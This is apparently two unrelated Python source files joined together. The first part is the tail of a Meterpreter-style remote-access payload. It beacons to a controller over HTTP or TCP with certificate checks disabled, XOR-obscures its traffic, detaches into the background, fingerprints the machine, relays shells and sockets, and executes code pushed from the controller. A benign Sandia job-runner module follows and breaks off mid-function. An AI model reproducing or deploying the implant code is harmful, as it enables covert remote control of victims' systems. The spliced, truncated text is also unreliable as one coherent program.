pkt = self.decrypt_packet(self._get_packet())
except:
debug_traceback()
return None
if pkt is None:
return None
self.communication_last = time.time()
return pkt
def encrypt_packet(self, pkt):
# The packet now has to contain session GUID and encryption flag info
# And given that we're not yet supporting AES, we're going to just
# always return the session guid and the encryption flag set to 0
# TODO: we'll add encryption soon!
xor_key = rand_xor_key()
raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', ENC_NONE) + pkt
result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw)
return result
def send_packet(self, pkt):
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.request_retire = False
try:
self._send_packet(self.encrypt_packet(pkt))
except:
debug_traceback()
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
opener.addheaders = []
if user_agent:
opener.addheaders.append(('User-Agent', user_agent))
if http_cookie:
opener.addheaders.append(('Cookie', http_cookie))
if http_referer:
opener.addheaders.append(('Referer', http_referer))
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
if http_host:
self._http_request_headers['Host'] = http_host
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
return True
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
try:
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < PACKET_HEADER_SIZE:
packet = None # looks corrupt
break
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
packet = None # looks corrupt
except:
debug_traceback('Failure to receive packet from ' + self.url)
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return packet
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.start()  # start() runs the socket cleanup in the background; run() would block this thread for up to communication_timeout
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return bytes()
packet = self.socket.recv(PACKET_HEADER_SIZE)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != PACKET_HEADER_SIZE:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
# XOR the whole header first
header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
# Extract just the length
pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0]
pkt_length -= 8
# Read the rest of the packet
rest = bytes()
while len(rest) < pkt_length:
rest += self.socket.recv(pkt_length - len(rest))
# return the whole packet, as it's decoded separately
return packet + rest
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self._transport_sleep = None
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_if(self, condition):
if condition:
return self.register_function
else:
return lambda function: function
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
if not isinstance(channel, MeterpreterChannel):
debug_print('[-] channel object is not an instance of MeterpreterChannel')
raise TypeError('invalid channel object')
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
if self._transport_sleep:
self.transport.deactivate()
time.sleep(self._transport_sleep)
self._transport_sleep = None
if not self.transport.activate():
self.transport_change()
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
write_request_parts = []
if isinstance(channel, MeterpreterProcess):
if not channel_id in self.interact_channels:
continue
proc_h = channel.proc_h
if proc_h.stderr_reader.is_read_ready():
data = proc_h.stderr_reader.read()
elif proc_h.stdout_reader.is_read_ready():
data = proc_h.stdout_reader.read()
elif not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketTCPClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.read(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketTCPServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.sock.accept()
server_addr = channel.sock.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
self.send_packet(tlv_pack_request('tcp_channel_open', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
{'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
{'type': TLV_TYPE_LOCAL_HOST, 'value': inet_pton(channel.sock.family, server_addr[0])},
{'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
{'type': TLV_TYPE_PEER_HOST, 'value': inet_pton(client_sock.family, client_addr[0])},
{'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},
]))
elif isinstance(channel, MeterpreterSocketUDPClient):
if select.select([channel.fileno()], [], [], 0)[0]:
try:
data, peer_address = channel.sock.recvfrom(65535)
except socket.error:
self.handle_dead_resource_channel(channel_id)
else:
write_request_parts.extend([
{'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]},
{'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]},
])
if data:
write_request_parts.extend([
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
{'type': TLV_TYPE_CHANNEL_DATA, 'value': data},
{'type': TLV_TYPE_LENGTH, 'value': len(data)},
])
self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.send_packet(tlv_pack_request('core_channel_close', [
{'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
]))
def _core_set_uuid(self, request, response):
global PAYLOAD_UUID  # rebind the module-level UUID; without this the assignment only creates a discarded local
new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
if new_uuid:
PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_get_session_guid(self, request, response):
response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')))
return ERROR_SUCCESS, response
def _core_set_session_guid(self, request, response):
global SESSION_GUID  # rebind the module-level session GUID rather than a discarded local
new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID)
if new_guid:
SESSION_GUID = binascii.b2a_hex(new_guid['value'])
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
if seconds:
self._transport_sleep = seconds
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
debug_print('[-] core_channel_open missing handler: ' + handler)
return error_result(NotImplementedError), response
debug_print('[*] core_channel_open dispatching to handler: ' + handler)
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_close(request, response)
if status == ERROR_SUCCESS:
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return status, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_eof(request, response)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status, response = channel.core_read(request, response)
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
status = ERROR_FAILURE
if channel.is_alive():
status, response = channel.core_write(request, response)
# evaluate channel.is_alive() twice because it could have changed
if not channel.is_alive():
self.handle_dead_resource_channel(channel_id)
return status, response
def create_response(self, request):
response = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
response += tlv_pack(method_tlv)
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, response)
if result is None:
return
result, response = result
except Exception:
debug_traceback('[-] method ' + handler_name + ' resulted in an error')
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
response += tlv_pack(reqid_tlv)
return response + tlv_pack(TLV_TYPE_RESULT, result)
_try_to_fork = TRY_TO_FORK and hasattr(os, 'fork')
if not _try_to_fork or (_try_to_fork and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT,
http_host=HTTP_HOST, http_referer=HTTP_REFERER, http_cookie=HTTP_COOKIE)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
runjob.py
|
#!/usr/bin/env python
# Copyright 2018 National Technology & Engineering Solutions of Sandia, LLC
# (NTESS). Under the terms of Contract DE-NA0003525 with NTESS, the U.S.
# Government retains certain rights in this software.
import sys
sys.dont_write_bytecode = True
sys.excepthook = sys.__excepthook__
import os
import time
import threading
import pipes
import traceback
import command
"""
Functions in this file run commands in a subprocess, such that
1. Output is always redirected to a log file
2. Commands are run and managed in the background
3. Commands can be executed on remote machines
The key functions are:
run_job : start a command in the background, and return a Job id
poll_job : returns True if a job id has completed
wait_job : waits for a job to complete, and returns the exit status
wait_all : waits for all jobs to complete, or only those in a given list of job ids
run_wait : convenience function for run_job() plus wait_job()
Commands to be run can be specified using
1. A single string, which is treated as a shell command
2. Multiple arguments, each of which is treated as a single shell argument
3. A single command.Command() object
The third form is the most versatile; refer to the command module for
documentation.
Note: See the documentation in the function "def _is_dryrun" below for use
of the environment variable COMMAND_DRYRUN for no-op (dry run) execution.
"""
def run_job( *args, **kwargs ):
"""
Starts a job in the background and returns the job id. The argument list
can be a single command.Command() object, a single string, or multiple
string arguments. The optional keyword attributes are
name : give the job a name, which prefixes the log file name
chdir : change to this directory before running the command
shell : True means apply shell expansion to the command, while False
means do not; default is True
timeout : apply a timeout to the command
timeout_date : timeout the job at the given date (epoch time in seconds)
machine : run the command on a remote machine
logdir : for remote commands, place the remote log file here
sharedlog : for remote commands, set this to True if the remote
machine can write its log file to the local log file
location (usually they share NFS mounts); in this case,
the 'logdir' option is not used
waitforjobid : only run this new job after the given jobid completes
sshexe : for remote commands, use this as the ssh program
connection_attempts : for remote commands, limit the number of attempts
to connect to the remote machine
poll_interval : For local jobs with a timeout, this is the sleep time
in seconds between checks for subprocess completion.
For jobs run on remote machines, this is the time in
seconds between log file pulls and the job completion
check
The keyword arguments are passed to the underlying Job object.
"""
return JobRunner.inst.submit_job( *args, **kwargs )
def poll_job( jobid ):
"""
Returns True if the 'jobid' completed. If the 'jobid' is unknown, an
exception is raised.
"""
return JobRunner.inst.isDone( jobid )
def wait_job( jobid, **kwargs ):
"""
Waits for the job to complete and returns a Job object. If the 'jobid'
does not exist, an exception is raised.
If the job is already complete, this function just returns the underlying
Job object. Thus, this function can be used to obtain the Job object
for any given job id.
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
return JobRunner.inst.complete( jobid, **kwargs )
def wait_all( *jobids, **kwargs ):
"""
Waits for each job to complete and returns the list of completed Job
objects. If no 'jobids' are given, all background jobs are waited upon.
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
return JobRunner.inst.complete_all( *jobids, **kwargs )
def run_wait( *args, **kwargs ):
"""
Starts a job in the background, waits on the job, and returns the exit
status. The arguments are the same as for run_job().
The optional keyword argument 'poll_interval' can be used to specify the
sleep time in seconds between polls.
"""
jid = JobRunner.inst.submit_job( *args, **kwargs )
jb = wait_job( jid, **kwargs )
x = jb.get( 'exit', None )
return x
###########################################################################
class Job:
def __init__(self, **kwargs):
"""
"""
self.lock = threading.Lock()
self.attrD = {}
for n,v in kwargs.items():
self.set( n, v )
# when the job is running, this is a threading.Thread() instance
self.runthread = None
self.state = 'setup'
def getState(self):
"""
Returns the state of the Job as a string, one of
setup : job setup/construction
ready : ready to be run (finalize was called)
run : thread has been started
done : thread was run and now finished
"""
return self.state
def __bool__(self):
"""
This allows a Job class instance to be cast (coerced) to True/False.
That is, an instance will evaluate to True if the job exited and the
exit status is zero. If the job has not been run yet, or is still
running, or the exit status is non-zero, then it evaluates to False.
"""
x = self.get( 'exit', 1 )
if type(x) == type(2) and x == 0:
return True
return False
__nonzero__ = __bool__
def has(self, attr_name):
"""
Returns True if the given attribute name is defined.
"""
self.lock.acquire()
try:
v = ( attr_name in self.attrD )
finally:
self.lock.release()
return v
def get(self, attr_name, *default):
"""
Get the value of an attribute. If a default is given and the attribute
is not set, then the default is returned.
"""
self.lock.acquire()
try:
if len(default) > 0:
v = self.attrD.get( attr_name, default[0] )
else:
v = self.attrD[attr_name]
finally:
self.lock.release()
return v
def clear(self, attr_name):
"""
Removes the attribute from the Job dict.
"""
assert attr_name and attr_name == attr_name.strip()
self.lock.acquire()
try:
if attr_name in self.attrD:
self.attrD.pop( attr_name )
finally:
self.lock.release()
def set(self, attr_name, attr_value):
"""
Set an attribute. The attribute name cannot be empty or contain
spaces at the beginning or end of the string.
Some attribute names have checks applied to their values.
"""
assert attr_name and attr_name == attr_name.strip()
if attr_name in ["name","machine"]:
assert attr_value and attr_value == attr_value.strip(), \
'invalid "'+attr_name+'" value: "'+str(attr_value)+'"'
elif attr_name in ['timeout','timeout_date']:
attr_value = int( attr_value )
elif attr_name == 'poll_interval':
attr_value = int( attr_value )
assert attr_value > 0
elif attr_name == 'sharedlog':
if attr_value: attr_value = True
else: attr_value = False
self.lock.acquire()
try:
self.attrD[attr_name] = attr_value
finally:
self.lock.release()
def date(self):
"""
Returns a formatted date string with no spaces. If a 'date' attribute
is not already set, the current time is used to create the date and
set the 'date' attribute.
"""
if not self.get( 'date', None ):
self.set( 'date', time.strftime( "%a_%b_%d_%Y_%H:%M:%S_%Z" ) )
return self.get( 'date' )
def logname(self):
"""
Returns the log file name for the job (without the directory).
"""
if not self.get( 'logname', None ):
n = self.get( 'name' )
m = self.get( 'machine', None )
if m: n += '-' + m
n += '-' + self.date() + '.log'
self.set( 'logname', n )
return self.get( 'logname' )
def logpath(self):
"""
Returns the remote log file path (directory plus file name).
"""
if not self.get( 'logpath', None ):
logn = self.logname()
cd = self.rundir()
logd = self.get( 'logdir', JobRunner.getDefault( 'logdir', cd ) )
if logd: logf = os.path.join( logd, logn )
else: logf = logn
self.set( 'logpath', logf )
return self.get( 'logpath' )
def rundir(self):
"""
Returns the directory in which the job will run, or None if it is not
specified.
"""
cd = self.get( 'chdir', None )
if cd == None:
cd = JobRunner.getDefault( 'chdir', None )
return cd
def jobid(self):
"""
Returns a tuple that uniquely identifies this job.
"""
return ( self.get( 'name', None ),
self.get( 'machine', None ),
self.date() )
def finalize(self):
"""
Checks that the job is well formed and marks it ready to run. An
exception is raised if the job is not well formed.
"""
self.jobid()
assert self.has( 'command' )
assert self.logname()
self.state = 'ready'
def start(self):
"""
Start the job execution in a separate thread. Returns without waiting
on the job. The job state is set to "run".
"""
try:
assert self.state == 'ready'
# a local function serves as the thread entry point to run the
# job; exceptions are caught, the 'exc' attribute set, and the
# exception re-raised
def threxec( jb ):
try:
jb.execute()
except:
xt,xv,xtb = sys.exc_info()
xs = ''.join( traceback.format_exception_only( xt, xv ) )
ct = time.ctime()
jb.set( 'exc', '[' + ct + '] ' + xs )
sys.stderr.write( '[' + ct + '] Exception: ' + xs + '\n' )
raise
t = threading.Thread( target=threxec, args=(self,) )
self.runthread = t
t.setDaemon( True ) # so ctrl-C will exit the program
# set the thread name so exceptions include the job id
if hasattr( t, 'setName' ):
t.setName( str( self.jobid() ) )
else:
t.name = str( self.jobid() )
t.start()
self.state = "run"
except:
self.state = "done"
raise
def poll(self):
"""
Tests for job completion. Returns the job state.
"""
if self.state == "run":
t = self.runthread
if hasattr( t, 'is_alive' ):
alive = t.is_alive()
else:
alive = t.isAlive()
if not alive:
t.join()
self.runthread = None
self.state = "done"
return self.state
def wait(self):
"""
Waits for the job to complete (for the underlying job thread to
finish).
"""
if self.state == "run":
self.runthread.join()
self.runthread = None
self.state = "done"
def execute(self):
"""
If the job does not have a 'machine' attribute, the command is run
directly as a subprocess with all output redirected to a log file.
When the command finishes, the exit status is set in the 'exit'
attribute and this function returns.
If the job has a 'machine' attribute, the remotepython.py module is
used to run the command on the remote machine in the background.
Output from the remote command is redirected to a log file, and that
log file is brought back every 'poll_interval' seconds. When the
remote command finishes, the exit status is set in the 'exit'
attribute and this function returns.
"""
self.clear( 'exit' )
mach = self.get( 'machine', None )
if not mach:
self._run_wait()
else:
self._run_remote( mach )
def _compute_timeout(self):
"""
Returns the timeout for the job by first looking for 'timeout' then
'timeout_date'.
"""
if self.has( 'timeout' ):
return self.get( 'timeout' )
if self.has( 'timeout_date' ):
return self.get( 'timeout_date' ) - time.time()
return JobRunner.getDefault( 'timeout' )
def _run_wait(self):
"""
"""
ipoll = self.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
timeout = self._compute_timeout()
cmd = self.get( 'command' )
shl = self.get( 'shell', True )
chd = self.rundir()
logn = self.logname()
cwd = os.getcwd()
logfp = open( logn, 'w' )
x = None
try:
if timeout == None:
x = cmd.run( shell=shl,
chdir=chd,
echo="none",
